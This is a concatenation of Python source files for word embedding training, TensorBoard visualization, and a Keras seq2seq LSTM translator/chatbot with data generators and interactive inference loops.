# split the corpus into sentences ("ayat") on periods
ayat = text.split(".")
words = []
for ayah in ayat:
    words.append(ayah.split())
# print(words[:5])
# stop words
stop_words = stopwords.words("arabic")
# most common come at the top
# vocab = [ w[0] for w in Counter(words).most_common() if w[0] not in stop_words]
# words = [ word for word in words if word not in stop_words]
# filter stop words out of every sentence
new_words = []
for ayah in words:
    new_words.append([ w for w in ayah if w not in stop_words])
# print(len(vocab))
# n = len(words) / sequence_length
# # split text to n sequences
# print(words[:10])
# words = chunk_seq(words, len(ayat))
# flatten to build the vocabulary
vocab = []
for ayah in new_words:
    for w in ayah:
        vocab.append(w)
vocab = sorted(set(vocab))
# ids start at 1 so that 0 is free for padding
vocab2int = {w: i for i, w in enumerate(vocab, start=1)}
int2vocab = {i: w for i, w in enumerate(vocab, start=1)}
encoded_words = []
for ayah in new_words:
    encoded_words.append([ vocab2int[w] for w in ayah ])
# pre-pad all sentences to the same length (default keras padding)
encoded_words = pad_sequences(encoded_words)
# print(encoded_words[10])
# decode back to tokens, mapping the 0 padding to "_unk_"
words = []
for seq in encoded_words:
    words.append([ int2vocab[w] if w != 0 else "_unk_" for w in seq ])
# print(words[:5])
# # define model
print("Training Word2Vec Model...")
model = gensim.models.Word2Vec(sentences=words, size=embedding_dim, workers=7, min_count=1, window=6)
path_to_save = r"E:\datasets\word2vec_quran.txt"
print("Saving model...")
# plain-text word2vec format so other tools can load it
model.wv.save_word2vec_format(path_to_save, binary=False)
# print(dir(model))
# print(dir(model))
from keras.layers import Embedding, LSTM, Dense, Activation, BatchNormalization
from keras.layers import Flatten
from keras.models import Sequential
from preprocess import words, vocab, sequence_length, sequences, vector_dim
from preprocess import window_size
# Minimal embedding -> dense model sketch built from the preprocess module.
model = Sequential()
model.add(Embedding(len(vocab), vector_dim, input_length=sequence_length))
model.add(Flatten())
model.add(Dense(1))
model.compile("adam", "binary_crossentropy")
# NOTE(review): fit() is called with no data/labels — as written this raises
# at runtime; looks like an unfinished sketch. TODO supply training data.
model.fit()
def chunk_seq(seq, num):
    """Split *seq* into *num* consecutive chunks of roughly equal length.

    Uses a fractional step so the remainder is spread across chunks;
    an empty sequence yields an empty list.
    """
    step = len(seq) / float(num)
    chunks, pos = [], 0.0
    while pos < len(seq):
        chunks.append(seq[int(pos):int(pos + step)])
        pos += step
    return chunks
def encode_words(words, vocab2int):
    """Map each word in *words* to its integer id via *vocab2int*,
    silently skipping out-of-vocabulary words.

    Fix: the original tested the looked-up id for truthiness, which also
    dropped any legitimate word whose id is 0 (ids elsewhere in this file
    start at 0); now only genuinely missing words (lookup -> None) are
    skipped.

    :param words: iterable of word tokens
    :param vocab2int: dict mapping word -> integer id
    :return: list of integer ids
    """
    # encoded = [ vocab2int[word] for word in words ]
    encoded = []
    append = encoded.append  # hoisted bound method for the hot loop
    for word in words:
        idx = vocab2int.get(word)
        if idx is not None:
            append(idx)
    return encoded
def remove_stop_words(vocab):
    """Remove a small fixed set of English stop words from *vocab* in place.

    Fix: ``list.remove`` raises ValueError when the word is absent, so the
    original crashed on any vocabulary that lacked even one of these
    words; each word is now removed only if present. Returns None (pure
    in-place mutation), like the original.

    :param vocab: mutable sequence of words, modified in place
    """
    # remove stop words
    for word in ("the", "of", "and", "in", "a", "to", "is", "as", "for"):
        if word in vocab:
            vocab.remove(word)
# encoding: utf-8
"""
author: BrikerMan
contact: eliyar917gmail.com
blog: https://eliyar.biz
version: 1.0
license: Apache Licence
file: w2v_visualizer.py
time: 2017/7/30 9:37
"""
import sys
import os
import pathlib
import numpy as np
from gensim.models.keyedvectors import KeyedVectors
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
def visualize(model, output_path):
    """Export a gensim word2vec *model* as a TensorBoard embedding-projector
    checkpoint plus a TSV metadata file under *output_path*.

    NOTE(review): uses the old gensim ``model[word]`` item access and
    ``wv.index2word`` — tied to gensim 3.x; confirm before upgrading.
    """
    meta_file = "w2x_metadata.tsv"
    # one row per vocabulary word, filled from the trained vectors
    placeholder = np.zeros((len(model.wv.index2word), model.vector_size))
    with open(os.path.join(output_path, meta_file), 'wb') as file_metadata:
        for i, word in enumerate(model.wv.index2word):
            placeholder[i] = model[word]
            # temporary solution for https://github.com/tensorflow/tensorflow/issues/9094
            if word == '':
                print("Emply Line, should replecaed by any thing else, or will cause a bug of tensorboard")
                file_metadata.write("{0}".format('<Empty Line>').encode('utf-8') + b'\n')
            else:
                file_metadata.write("{0}".format(word).encode('utf-8') + b'\n')
    # define the model without training
    sess = tf.InteractiveSession()
    # the variable name must match embed.tensor_name below
    embedding = tf.Variable(placeholder, trainable=False, name='w2x_metadata')
    tf.global_variables_initializer().run()
    saver = tf.train.Saver()
    writer = tf.summary.FileWriter(output_path, sess.graph)
    # adding into projector
    config = projector.ProjectorConfig()
    embed = config.embeddings.add()
    embed.tensor_name = 'w2x_metadata'
    embed.metadata_path = meta_file
    # Specify the width and height of a single thumbnail.
    projector.visualize_embeddings(writer, config)
    saver.save(sess, os.path.join(output_path, 'w2x_metadata.ckpt'))
    print('Run tensorboard --logdir={0} to run visualize result on tensorboard'.format(output_path))
if __name__ == "__main__":
    """
    Use model.save_word2vec_format to save w2v_model as word2evc format
    Then just run python w2v_visualizer.py word2vec.text visualize_result
    """
    try:
        model_path = sys.argv[1]
        output_path = sys.argv[2]
    except IndexError:
        # Fix: the original bare except printed the usage message but fell
        # through, crashing with a NameError on the undefined paths; exit
        # explicitly with a non-zero status instead.
        print("Please provice model path and output path")
        sys.exit(1)
    model = KeyedVectors.load_word2vec_format(model_path)
    # create the output directory (and parents) if missing
    pathlib.Path(output_path).mkdir(parents=True, exist_ok=True)
    visualize(model, output_path)
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
import pickle
import tqdm
class NMTGenerator:
    """A class utility for generating Neural-Machine-Translation large datasets.

    Loads a parallel source/target corpus, tokenizes it with Keras
    tokenizers, pads it, splits train/validation and serves batches via
    the ``next_train``/``next_validation`` infinite generators in the
    ``([encoder_input, decoder_input], decoder_target)`` layout expected
    by a teacher-forced seq2seq model.
    """
    def __init__(self, source_file, target_file, num_encoder_tokens=None, num_decoder_tokens=None,
                 source_sequence_length=None, target_sequence_length=None, x_tk=None, y_tk=None,
                 batch_size=256, validation_split=0.15, load_tokenizers=False, dump_tokenizers=True,
                 same_tokenizer=False, char_level=False, verbose=0):
        self.source_file = source_file
        self.target_file = target_file
        self.same_tokenizer = same_tokenizer
        self.char_level = char_level
        if not load_tokenizers:
            # x ( source ) tokenizer
            self.x_tk = x_tk if x_tk else Tokenizer(char_level=self.char_level)
            # y ( target ) tokenizer
            self.y_tk = y_tk if y_tk else Tokenizer(char_level=self.char_level)
        else:
            # reuse tokenizers pickled by a previous run's tokenize()
            self.x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
            self.y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
        # remove '?' and '.' from filters
        # which means include them in vocabulary
        # add "'" to filters
        self.x_tk.filters = self.x_tk.filters.replace("?", "").replace("_", "") + "'"
        self.y_tk.filters = self.y_tk.filters.replace("?", "").replace("_", "") + "'"
        if char_level:
            # at char level, keep '.' and ',' as vocabulary items too
            self.x_tk.filters = self.x_tk.filters.replace(".", "").replace(",", "")
            self.y_tk.filters = self.y_tk.filters.replace(".", "").replace(",", "")
        if same_tokenizer:
            # share one vocabulary between source and target
            self.y_tk = self.x_tk
        # max sequence length of source language
        self.source_sequence_length = source_sequence_length
        # max sequence length of target language
        self.target_sequence_length = target_sequence_length
        # vocab size of encoder
        self.num_encoder_tokens = num_encoder_tokens
        # vocab size of decoder
        self.num_decoder_tokens = num_decoder_tokens
        # the batch size
        self.batch_size = batch_size
        # the ratio which the dataset will be partitioned
        self.validation_split = validation_split
        # whether to dump x_tk and y_tk when finished tokenizing
        self.dump_tokenizers = dump_tokenizers
        # cap to remove _unk_ samples
        self.n_unk_to_remove = 2
        self.verbose = verbose
    def load_dataset(self):
        """Loads the dataset:
        1. load the data from files
        2. tokenize and calculate sequence lengths and num_tokens
        3. post pad the sequences"""
        self.load_data()
        if self.verbose:
            print("[+] Data loaded")
        self.tokenize()
        if self.verbose:
            print("[+] Text tokenized")
        self.pad_sequences()
        if self.verbose:
            print("[+] Sequences padded")
        self.split_data()
        if self.verbose:
            print("[+] Data splitted")
    def load_data(self):
        """Loads data from files"""
        # calls the module-level load_data() helper, not this method
        self.X = load_data(self.source_file)
        self.y = load_data(self.target_file)
        # remove much unks on a single sample
        X, y = [], []
        co = 0
        for question, answer in zip(self.X, self.y):
            # drop pairs where either side has too many _unk_ tokens
            if question.count("_unk_") >= self.n_unk_to_remove or answer.count("_unk_") >= self.n_unk_to_remove:
                co += 1
            else:
                X.append(question)
                y.append(answer)
        self.X = X
        self.y = y
        if self.verbose >= 1:
            print("[*] Number of samples:", len(self.X))
        if self.verbose >= 2:
            print("[!] Number of samples deleted:", co)
    def tokenize(self):
        """Tokenizes sentences/strings as well as calculating input/output sequence lengths
        and input/output vocab sizes"""
        self.x_tk.fit_on_texts(self.X)
        self.y_tk.fit_on_texts(self.y)
        self.X = self.x_tk.texts_to_sequences(self.X)
        self.y = self.y_tk.texts_to_sequences(self.y)
        # calculate both sequence lengths ( source and target )
        self.source_sequence_length = max([len(x) for x in self.X])
        self.target_sequence_length = max([len(x) for x in self.y])
        # calculating number of encoder/decoder vocab sizes
        # (+1 because Keras tokenizer ids start at 1; 0 is padding)
        self.num_encoder_tokens = len(self.x_tk.index_word) + 1
        self.num_decoder_tokens = len(self.y_tk.index_word) + 1
        # dump tokenizers
        # NOTE(review): dumps unconditionally — the dump_tokenizers flag
        # accepted by __init__ is never consulted here. TODO confirm.
        pickle.dump(self.x_tk, open("results/x_tk.pickle", "wb"))
        pickle.dump(self.y_tk, open("results/y_tk.pickle", "wb"))
    def pad_sequences(self):
        """Pad sequences"""
        # post-padding: zeros appended after the sequence
        self.X = pad_sequences(self.X, maxlen=self.source_sequence_length, padding='post')
        self.y = pad_sequences(self.y, maxlen=self.target_sequence_length, padding='post')
    def split_data(self):
        """split training/validation sets using self.validation_split"""
        split_value = int(len(self.X)*self.validation_split)
        self.X_test = self.X[:split_value]
        self.X_train = self.X[split_value:]
        self.y_test = self.y[:split_value]
        self.y_train = self.y[split_value:]
        # free up memory
        del self.X
        del self.y
    def shuffle_data(self, train=True):
        """Shuffles X and y together
        :params train (bool): whether to shuffle training data, default is True
        Note that when train is False, testing data is shuffled instead."""
        # re-seeding with the saved RNG state keeps X and y aligned
        state = np.random.get_state()
        if train:
            np.random.shuffle(self.X_train)
            np.random.set_state(state)
            np.random.shuffle(self.y_train)
        else:
            np.random.shuffle(self.X_test)
            np.random.set_state(state)
            np.random.shuffle(self.y_test)
    def next_train(self):
        """Training set generator"""
        return self.generate_batches(self.X_train, self.y_train, train=True)
    def next_validation(self):
        """Validation set generator"""
        return self.generate_batches(self.X_test, self.y_test, train=False)
    def generate_batches(self, X, y, train=True):
        """Data generator"""
        same_tokenizer = self.same_tokenizer
        batch_size = self.batch_size
        char_level = self.char_level
        source_sequence_length = self.source_sequence_length
        target_sequence_length = self.target_sequence_length
        if same_tokenizer:
            # with a shared tokenizer, use one vocab size for both sides
            num_encoder_tokens = max([self.num_encoder_tokens, self.num_decoder_tokens])
            num_decoder_tokens = num_encoder_tokens
        else:
            num_encoder_tokens = self.num_encoder_tokens
            num_decoder_tokens = self.num_decoder_tokens
        while True:
            for j in range(0, len(X), batch_size):
                encoder_input_data = X[j: j+batch_size]
                decoder_input_data = y[j: j+batch_size]
                # update batch size ( different size in last batch of the dataset )
                # NOTE(review): this rebinds the same `batch_size` used as the
                # range() stride above, so after a short final batch every
                # subsequent epoch iterates with the smaller stride — confirm
                # whether that is intended.
                batch_size = encoder_input_data.shape[0]
                if self.char_level:
                    encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens))
                    decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
                else:
                    encoder_data = encoder_input_data
                    decoder_data = decoder_input_data
                decoder_target_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
                if char_level:
                    # if its char level, one-hot all sequences of characters
                    for i, sequence in enumerate(decoder_input_data):
                        for t, word_index in enumerate(sequence):
                            if t > 0:
                                # target is the decoder input shifted one step left
                                decoder_target_data[i, t - 1, word_index] = 1
                            decoder_data[i, t, word_index] = 1
                    for i, sequence in enumerate(encoder_input_data):
                        for t, word_index in enumerate(sequence):
                            encoder_data[i, t, word_index] = 1
                else:
                    # if its word level, one-hot only target_data ( the one compared with dense )
                    for i, sequence in enumerate(decoder_input_data):
                        for t, word_index in enumerate(sequence):
                            if t > 0:
                                decoder_target_data[i, t - 1, word_index] = 1
                yield ([encoder_data, decoder_data], decoder_target_data)
            # shuffle data when an epoch is finished
            self.shuffle_data(train=train)
def get_embedding_vectors(tokenizer):
    """Build a ``(vocab_size + 1, 300)`` embedding matrix for *tokenizer*
    from the GloVe 6B 300-d vectors file.

    Rows for words missing from GloVe are left all-zero; row 0 is unused
    (Keras tokenizer ids start at 1).
    """
    vectors_by_word = {}
    with open("data/glove.6B.300d.txt", encoding='utf8') as f:
        for line in tqdm.tqdm(f, "Reading GloVe"):
            parts = line.split()
            # first token is the word, the rest are its 300 components
            vectors_by_word[parts[0]] = np.asarray(parts[1:], dtype='float32')
    word_index = tokenizer.word_index
    matrix = np.zeros((len(word_index) + 1, 300))
    for word, row in word_index.items():
        vector = vectors_by_word.get(word)
        if vector is not None:
            matrix[row] = vector
    return matrix
def load_data(filename):
    """Read *filename* and return a list of its stripped lines.

    Fix: the tqdm description was an f-string with no placeholder (it
    printed a literal placeholder artifact instead of the file name); it
    now interpolates *filename*.
    """
    text = []
    append = text.append  # hoisted bound method for the per-line loop
    with open(filename) as f:
        for line in tqdm.tqdm(f, f"Reading {filename}"):
            line = line.strip()
            append(line)
    return text
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
# def tokenize(x, tokenizer=None):
# """Tokenize x
# :param x: List of sentences/strings to be tokenized
# :return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
# if tokenizer:
# t = tokenizer
# else:
# t = Tokenizer()
# t.fit_on_texts(x)
# return t.texts_to_sequences(x), t
# def pad(x, length=None):
# """Pad x
# :param x: list of sequences
# :param length: Length to pad the sequence to, If None, use length
# of longest sequence in x.
# :return: Padded numpy array of sequences"""
# return pad_sequences(x, maxlen=length, padding="post")
# def preprocess(x, y):
# """Preprocess x and y
# :param x: Feature list of sentences
# :param y: Label list of sentences
# :return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
# preprocess_x, x_tk = tokenize(x)
# preprocess_y, y_tk = tokenize(y)
# preprocess_x2 = [ [0] + s for s in preprocess_y ]
# longest_x = max([len(i) for i in preprocess_x])
# longest_y = max([len(i) for i in preprocess_y]) + 1
# # max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
# max_length = longest_x if longest_x > longest_y else longest_y
# preprocess_x = pad(preprocess_x, length=max_length)
# preprocess_x2 = pad(preprocess_x2, length=max_length)
# preprocess_y = pad(preprocess_y, length=max_length)
# # preprocess_x = to_categorical(preprocess_x)
# # preprocess_x2 = to_categorical(preprocess_x2)
# preprocess_y = to_categorical(preprocess_y)
# return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
from keras.layers import Embedding, TimeDistributed, Dense, GRU, LSTM, Input
from keras.models import Model, Sequential
from keras.utils import to_categorical
import numpy as np
import tqdm
def encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_matrix=None, embedding_layer=True):
    """Build a teacher-forced seq2seq LSTM model plus its inference halves.

    :param num_encoder_tokens: encoder vocabulary size
    :param latent_dim: LSTM (and embedding) dimensionality
    :param num_decoder_tokens: decoder vocabulary size (softmax width)
    :param embedding_matrix: optional pre-trained weights for a frozen
        embedding layer
    :param embedding_layer: if False, inputs are expected already one-hot
        encoded instead of as integer ids
    :return: tuple of (training model, encoder inference model,
        decoder inference model)

    Fix: the training ``Model`` was built with the deprecated ``output=``
    keyword while the sibling models used positional arguments; it is now
    constructed positionally, consistently with the others.
    """
    # ENCODER
    # define an input sequence and process it
    if embedding_layer:
        encoder_inputs = Input(shape=(None,))
        if embedding_matrix is None:
            encoder_emb_layer = Embedding(num_encoder_tokens, latent_dim, mask_zero=True)
        else:
            # frozen embedding initialized from pre-trained vectors
            encoder_emb_layer = Embedding(num_encoder_tokens,
                                          latent_dim,
                                          mask_zero=True,
                                          weights=[embedding_matrix],
                                          trainable=False)
        encoder_emb = encoder_emb_layer(encoder_inputs)
    else:
        encoder_inputs = Input(shape=(None, num_encoder_tokens))
        encoder_emb = encoder_inputs
    encoder_lstm = LSTM(latent_dim, return_state=True)
    encoder_outputs, state_h, state_c = encoder_lstm(encoder_emb)
    # we discard encoder_outputs and only keep the states
    encoder_states = [state_h, state_c]
    # DECODER
    # Set up the decoder, using encoder_states as initial state
    if embedding_layer:
        decoder_inputs = Input(shape=(None,))
    else:
        decoder_inputs = Input(shape=(None, num_encoder_tokens))
    # the decoder shares the encoder's embedding layer (joint vocabulary)
    # decoder_emb_layer = Embedding(num_decoder_tokens, latent_dim, mask_zero=True)
    if embedding_layer:
        decoder_emb = encoder_emb_layer(decoder_inputs)
    else:
        decoder_emb = decoder_inputs
    # we set up our decoder to return full output sequences
    # and to return internal states as well, we don't use the
    # return states in the training model, but we will use them in inference
    decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
    decoder_outputs, _, _ = decoder_lstm(decoder_emb, initial_state=encoder_states)
    # dense output layer used to predict each character ( or word )
    # in one-hot manner, not recursively
    decoder_dense = Dense(num_decoder_tokens, activation="softmax")
    decoder_outputs = decoder_dense(decoder_outputs)
    # finally, the model is defined with inputs for the encoder and the decoder
    # and the output target sequence
    # turn encoder_input_data & decoder_input_data into decoder_target_data
    model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
    # model.summary()
    # define encoder inference model
    encoder_model = Model(encoder_inputs, encoder_states)
    # define decoder inference model: previous states come in as inputs
    decoder_state_input_h = Input(shape=(latent_dim,))
    decoder_state_input_c = Input(shape=(latent_dim,))
    decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
    # Get the embeddings of the decoder sequence
    if embedding_layer:
        dec_emb2 = encoder_emb_layer(decoder_inputs)
    else:
        dec_emb2 = decoder_inputs
    decoder_outputs, state_h, state_c = decoder_lstm(dec_emb2, initial_state=decoder_states_inputs)
    decoder_states = [state_h, state_c]
    decoder_outputs = decoder_dense(decoder_outputs)
    decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)
    return model, encoder_model, decoder_model
def predict_sequence(enc, dec, source, n_steps, cardinality, char_level=False):
    """Generate target given source sequence, this function can be used
    after the model is trained to generate a target sequence given a source
    sequence.

    :param enc: encoder inference model (predict -> state list)
    :param dec: decoder inference model (predict -> (y, h, c))
    :param source: encoded source sequence
    :param n_steps: number of decode steps to run
    :param cardinality: decoder vocabulary size (one-hot width)
    :param char_level: if True, feed one-hot vectors instead of ids
    :return: np.array of n_steps predictions (ids, or one-hot rows when
        char_level is True)

    Fix: the one-hot width was hard-coded to 61 in three places even
    though *cardinality* was accepted as a parameter; it now honors
    *cardinality*.
    """
    # encode the source into the initial decoder state
    state = enc.predict(source)
    # start of sequence input
    if char_level:
        target_seq = np.zeros((1, 1, cardinality))
    else:
        target_seq = np.zeros((1, 1))
    # collect predictions
    output = []
    for t in range(n_steps):
        # predict next char
        yhat, h, c = dec.predict([target_seq] + state)
        # store predictions
        y = yhat[0, 0, :]
        if char_level:
            sampled_token_index = to_categorical(np.argmax(y), num_classes=cardinality)
        else:
            sampled_token_index = np.argmax(y)
        output.append(sampled_token_index)
        # update state
        state = [h, c]
        # update target sequence (feed the prediction back in)
        if char_level:
            target_seq = np.zeros((1, 1, cardinality))
        else:
            target_seq = np.zeros((1, 1))
        target_seq[0, 0] = sampled_token_index
    return np.array(output)
def decode_sequence(enc, dec, input_seq):
    """Greedily decode *input_seq*, collecting the raw decoder output
    distribution at each step until the 50-step cap is reached.

    :param enc: encoder inference model (predict -> state list)
    :param dec: decoder inference model (predict -> (tokens, h, c))
    :return: list of per-step output distributions (length 51)

    Fixes: the original appended to (and returned) ``decoded_sentence``, a
    name that was never initialized (only ``decoded_sequence`` was), so it
    raised NameError on the first iteration. It also compared the raw
    float array ``output_tokens`` against the string '<PAD>' as a stop
    condition — that comparison can never be true and is dropped; only the
    length cap remains, which matches the original's effective behavior.
    """
    # Encode the input as state vectors.
    states_value = enc.predict(input_seq)
    # Generate empty target sequence of length 1.
    target_seq = np.zeros((1, 1))
    # Populate the first character of target sequence with the start character.
    target_seq[0, 0] = 0
    # Sampling loop for a batch of sequences
    # (to simplify, here we assume a batch of size 1).
    decoded_sequence = []
    while True:
        output_tokens, h, c = dec.predict([target_seq] + states_value)
        # Sample a token (greedy argmax over the last timestep)
        sampled_token_index = np.argmax(output_tokens[0, -1, :])
        decoded_sequence.append(output_tokens[0, -1, :])
        # Exit condition: hit max length.
        if len(decoded_sequence) > 50:
            return decoded_sequence
        # Update the target sequence (of length 1) with the sampled token.
        target_seq = np.zeros((1, 1))
        target_seq[0, 0] = sampled_token_index
        # Update states
        states_value = [h, c]
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
def tokenize(x, tokenizer=None):
    """Tokenize the sentences in *x*.

    :param x: list of sentences/strings to tokenize
    :param tokenizer: optional pre-fitted tokenizer; when omitted (or
        falsy) a fresh ``Tokenizer`` is created and fitted on *x*
    :return: tuple of (tokenized sequences, tokenizer used)
    """
    if not tokenizer:
        tokenizer = Tokenizer()
        tokenizer.fit_on_texts(x)
    return tokenizer.texts_to_sequences(x), tokenizer
def pad(x, length=None):
    """Post-pad the sequences in *x* with zeros.

    :param x: list of integer sequences
    :param length: target length; when None, the longest sequence in *x*
        sets the width
    :return: padded numpy array of sequences
    """
    return pad_sequences(x, maxlen=length, padding="post")
def preprocess(x, y):
    """Tokenize and pad the feature/label sentence lists for seq2seq training.

    :param x: feature list of sentences
    :param y: label list of sentences
    :return: tuple of (padded x, right-shifted padded y, one-hot y,
        x tokenizer, y tokenizer)
    """
    x_seqs, x_tk = tokenize(x)
    y_seqs, y_tk = tokenize(y)
    # decoder input: target sequences shifted right by one leading 0
    shifted_y = [[0] + seq for seq in y_seqs]
    # pad everything to one common width: the longest of the source
    # sequences and the (shifted) target sequences
    # max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
    pad_width = max(max(len(seq) for seq in x_seqs),
                    max(len(seq) for seq in y_seqs) + 1)
    x_seqs = pad(x_seqs, length=pad_width)
    shifted_y = pad(shifted_y, length=pad_width)
    y_seqs = pad(y_seqs, length=pad_width)
    # only the comparison target is one-hot encoded
    y_onehot = to_categorical(y_seqs)
    return x_seqs, shifted_y, y_onehot, x_tk, y_tk
def load_data(filename):
    """Read *filename* and return its contents as a list of lines.

    :param filename: path of the text file to read
    :return: list of lines; a trailing newline in the file yields a final
        empty entry (plain str.split semantics)
    """
    with open(filename) as f:
        return f.read().split("\n")
def load_dataset():
    """Load and preprocess the small English/French parallel corpus."""
    english = load_data("data/small_vocab_en")
    french = load_data("data/small_vocab_fr")
    return preprocess(english, french)
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
if __name__ == "__main__":
    # Smoke-test the NMT data generator: load the corpus, print its
    # vocabulary/shape statistics, then stream batches indefinitely.
    from generator import NMTGenerator
    gen = NMTGenerator(source_file="data/small_vocab_en", target_file="data/small_vocab_fr")
    gen.load_dataset()
    print(gen.num_decoder_tokens)
    print(gen.num_encoder_tokens)
    print(gen.source_sequence_length)
    print(gen.target_sequence_length)
    print(gen.X.shape)
    print(gen.y.shape)
    for i, ((encoder_input_data, decoder_input_data), decoder_target_data) in enumerate(gen.generate_batches()):
        # print("encoder_input_data.shape:", encoder_input_data.shape)
        # print("decoder_output_data.shape:", decoder_input_data.shape)
        # log one decoder input roughly once per full pass over the dataset
        if i % (len(gen.X) // gen.batch_size + 1) == 0:
            print(i, ": decoder_input_data:", decoder_input_data[0])
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# restrict TensorFlow to CPU-only execution with a small thread pool
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                        )
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
# restore the tokenizers fitted during training
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
# inverse vocabulary: token id -> word; id 0 is the padding placeholder
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
    """
    Map a sequence of predicted token ids back to a space-joined sentence.
    :param logits: iterable of token ids (already argmax-decoded upstream)
    :return: decoded sentence as a single string
    """
    words = (index_to_words[token] for token in logits)
    return ' '.join(words)
# word-level vocabulary size (shared by encoder and decoder)
num_encoder_tokens = 29046
num_decoder_tokens = 29046
latent_dim = 300
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_v13_4.831_0.219.h5")
# interactive chat loop: tokenize + pad input to length 37, decode reply
while True:
    text = input("> ")
    tokenized = tokenize([text], tokenizer=y_tk)[0]
    # print("tokenized:", tokenized)
    X = pad(tokenized, length=37)
    sequence = predict_sequence(enc, dec, X, 37, num_decoder_tokens)
    # print(sequence)
    result = logits_to_text(sequence)
    print(result)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# restrict TensorFlow to CPU-only execution with a small thread pool
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                        )
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
# restore the tokenizers fitted during training (char-level here)
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
# inverse vocabulary: char id -> char; id 0 is the padding placeholder
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
    """
    Decode a sequence of one-hot vectors into a character string.
    :param logits: iterable of one-hot rows, one per output character
    :return: decoded string
    """
    chars = []
    for row in logits:
        # index of the single hot entry in this one-hot row
        hot_index = np.where(row)[0][0]
        chars.append(index_to_words[hot_index])
    return "".join(chars)
# character-level vocabulary size (shared by encoder and decoder)
num_encoder_tokens = 61
num_decoder_tokens = 61
latent_dim = 384
# embedding_vectors = get_embedding_vectors(x_tk)
# char-level model takes one-hot inputs directly, hence no embedding layer
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_layer=False)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
# interactive chat loop: one-hot encode the input, decode up to 206 chars
while True:
    text = input("> ")
    tokenized = tokenize([text], tokenizer=y_tk)[0]
    # print("tokenized:", tokenized)
    X = to_categorical(pad(tokenized, length=37), num_classes=num_encoder_tokens)
    # print(X)
    sequence = predict_sequence(enc, dec, X, 206, num_decoder_tokens, char_level=True)
    # print(sequence)
    result = logits_to_text(sequence)
    print(result)
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
